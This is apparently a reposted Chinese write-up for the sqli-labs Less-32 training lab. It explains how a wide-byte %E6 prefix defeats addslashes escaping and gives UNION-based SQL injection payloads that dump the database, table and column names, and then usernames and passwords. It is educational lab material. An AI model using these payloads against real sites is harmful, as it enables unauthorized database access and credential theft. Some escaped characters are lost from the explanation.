Less(32)GET - Bypass custom filter adding slashes to dangerous chars
Posted meng-yu37
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Less(32)GET - Bypass custom filter adding slashes to dangerous chars相关的知识,希望对你有一定的参考价值。
1.查看一下php文件:
check_addslashes()会在单引号前加一个 例如:I‘m hacker 传入addslashes(),得到:I‘m hacker
本题想以此阻止sql注入语句闭合,但是可以使用宽字节绕过:
原理大概来说就是,一个双字节组成的字符,比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id=-1%E6‘ 这样的构造时,‘ 前面加的 就会和%E6 合在一起,但是又不是一个正常汉字,但是起到了注掉 的作用,库。
2.爆破
(1)爆库:?id=-1%E6‘ union select 1,2,database() --+
(2)爆表:?id=-1%E6‘ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+
需要对战ASCII码表,将security换成其对应的16进制
(3)爆列名:?id=-1%E6‘ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--+
(4)爆值:?id=-1%E6‘ union select 1,group_concat(username,0x7e,password),3 from security.users --+
原文链接:https://blog.csdn.net/qq_41420747/article/details/81836327
以上是关于Less(32)GET - Bypass custom filter adding slashes to dangerous chars的主要内容,如果未能解决你的问题,请参考以下文章
sqli-labs less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符(代
Less(33)GET-Bypass AddSlasher()
sqli-labs less35 GET- Bypass Add Slashes(we dont need them) Integer based (GET型绕过addslashes() 函数的整(代
sqli-labs less36 GET- Bypass MYSQL_real_escape_string (GET型绕过MYSQL_real_escape_string的注入)
Less(37)POST-Bypass MySQLreal escape_string
sqli-labs less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)